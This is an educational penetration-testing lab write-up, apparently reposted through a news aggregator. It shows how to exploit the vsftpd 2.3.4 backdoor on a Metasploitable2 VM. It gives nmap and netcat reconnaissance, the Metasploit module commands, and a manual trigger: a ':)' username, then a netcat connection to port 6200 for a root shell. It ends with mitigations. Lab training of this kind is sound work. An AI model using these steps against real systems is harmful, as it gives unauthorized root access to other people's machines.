惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
A
About on SuperTechFans
Y
Y Combinator Blog
V
V2EX
Engineering at Meta
Engineering at Meta
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
V
Visual Studio Blog
博客园 - 叶小钗
博客园 - 聂微东
阮一峰的网络日志
阮一峰的网络日志
H
Help Net Security
小众软件
小众软件
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
The GitHub Blog
The GitHub Blog
WordPress大学
WordPress大学
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
MongoDB | Blog
MongoDB | Blog
B
Blog
G
Google Developers Blog
J
Java Code Geeks
博客园 - 三生石上(FineUI控件)
IT之家
IT之家
N
Netflix TechBlog - Medium
腾讯CDC

DEV Community

Authentication Security Deep Dive: From Brute Force to Salted Hashing (With Java Examples) Why AI Systems Don’t Fail — They Drift Spilling beans for how i learn for exam😁"Reinforcement Learning Cheat Sheet" I Replaced Chrome with Safari for AI Browser Automation. Here's What Broke (and What Finally Worked) How Python Borrows Other People's Work The $40 Architecture: Processing 1 Billion API Requests with 99.99% Uptime Vibe Coding: A Workflow Guide (From Zero to SaaS) Most webhook security guides protect the wrong side. The scary part is delivery. Headless CMS for TanStack Start: Build a Blog with Cosmic EU Age Verification App "Hacked in 2 Minutes" — What Actually Happened Comfy Cloud’s delete function does not actually remove files Running AI Models on GPU Cloud Servers: A Beginner Guide Event-driven media intelligence with AWS Step Functions and Bedrock I scored 500 AI prompts across 8 quality dimensions — here's what broke How to Call Google Gemini API from Next.js (Free Tier, No Backend Needed) The Portal Protocol: Reclaiming Human Connection in the Age of AI How to Fix Your Team's Scattered Knowledge Problem With a Self-Hosted Forum Intro to tc Cloud Functors: A Graph-First Mental Model for the Modern Cloud Designing Multi-Tenant Backends With Both Ownership and Team Access I Built a Neumorphic CSS Library with 77+ Components — Here's What I Learned PostgreSQL Performance Optimization: Why Connection Pooling Is Critical at Scale Cómo construí un SaaS multi-rubro para gestionar expensas en Argentina con FastAPI + Vue 3 🚀 I Built an Ethical Hacking Scanner Tool – Open Source Project I Replaced /usage and /context in Claude Code With a Single Statusline A Pythonic Way to Handle Emails (IMAP/SMTP) with Auto-Discovery and AI-Ready Design I Collected 8.9 Million Polymarket Price Points — Here's What I Found About How Markets Really Move EcoTrack AI — Carbon Footprint Tracker & Dashboard Everyone's Using AI. No One Agrees How. 5 self-hosted ebook managers worth trying in 2026 Building Your First AI Agent with LangChain: From Chatbot to Autonomous Assistant
Metasploitable2 - FTP Exploitation using vsftpd 2.3.4 Bac...
Soumya Ranja · 2026-05-05 · via DEV Community

Soumya Ranjan 🎖️

Metasploitable2 - FTP Exploitation using vsftpd 2.3.4 Backdoor

1. Objective

To identify and exploit a known vulnerability in an FTP service running on a vulnerable target machine using industry-standard reconnaissance and exploitation techniques.

2. Lab Environment

Component Description
Attacker Machine Kali Linux
Target Machine Metasploitable2
Network Type Host-only / NAT (same subnet)

3. Tools & Technologies Used

  • #Nmap – Network discovery and service enumeration
  • #Netcat – Banner grabbing and manual interaction
  • #Metasploit Framework – Exploitation
  • #Exploit_Database – Exploit reference

4. Methodology

Step 1: Identify Attacker Machine IP

ip a

  • Extract the IP address of the Kali machine (e.g., 192.168.1.159)

Step 2: Network Discovery


nmap -sn 192.168.1.0/24

  • Performs a ping scan to identify active hosts
  • Target identified: 192.168.1.160 → Metasploitable2

Step 3: Service Enumeration


nmap -sV 192.168.1.160

![[Pasted image 20260418144903.png]]

  • Detects running services and versions
  • Key finding: FTP → vsftpd 2.3.4

Step 4: Targeted Port Scan (FTP)


nmap -p 21 -sV 192.168.1.160

  • Confirms FTP service version

Step 5: #Banner_Grabbing (Manual Verification)

Using Netcat:


nc 192.168.1.160 21

![[Pasted image 20260418154605.png]]

  • Confirms: vsftpd 2.3.4

5. Vulnerability Identification

  • Software: vsftpd 2.3.4
  • Issue: Backdoor intentionally inserted in this version
  • Exploit Source: Exploit DB
  • Public exploit available:
    • Backdoor triggered via malicious username input

6. Exploitation using Metasploit

Step 1: Launch Framework


msfconsole

Step 2: Search for Exploit


search vsftpd

  • Relevant module: exploit/unix/ftp/vsftpd_234_backdoor ### Step 3: Load Exploit


use exploit/unix/ftp/vsftpd_234_backdoor

Step 4: Configure Target


set RHOST 192.168.1.160

Step 5: Configure listener

Shell
set LHOST <Your IP>

![[Pasted image 20260418152458.png]]

Step 5: Execute Exploit


run

Result

  • Remote shell access obtained
  • Privilege level: root

7. Manual Exploitation (Without Metasploit)

Step 1: Connect to FTP


ftp 192.168.1.160

Step 2: Trigger Backdoor

  • Username: test:)
  • Password: anything

Step 3: Connect to Backdoor Shell


nc 192.168.1.160 6200

Result

  • Direct root shell access established ## 8. Technical Explanation of the Vulnerability

The backdoor in vsftpd 2.3.4 operates as follows:

  • If the username contains :)
  • The service triggers a hidden function
  • Opens TCP port 6200
  • Provides unauthenticated root shell access

Attack Flow


Attacker → FTP Login (malicious username)
→ Backdoor Triggered
→ Port 6200 Opened
→ Root Shell Access

9. Impact Analysis

Factor Impact
Confidentiality Fully compromised
Integrity Fully compromised
Availability Potentially disrupted
Access Level Root
  • Classified as Critical (CVSS ~10.0)

10. Mitigation & Remediation

  • Upgrade FTP service to a secure version
  • Avoid using outdated software
  • Implement network segmentation
  • Use IDS/IPS to detect abnormal behavior
  • Disable unnecessary services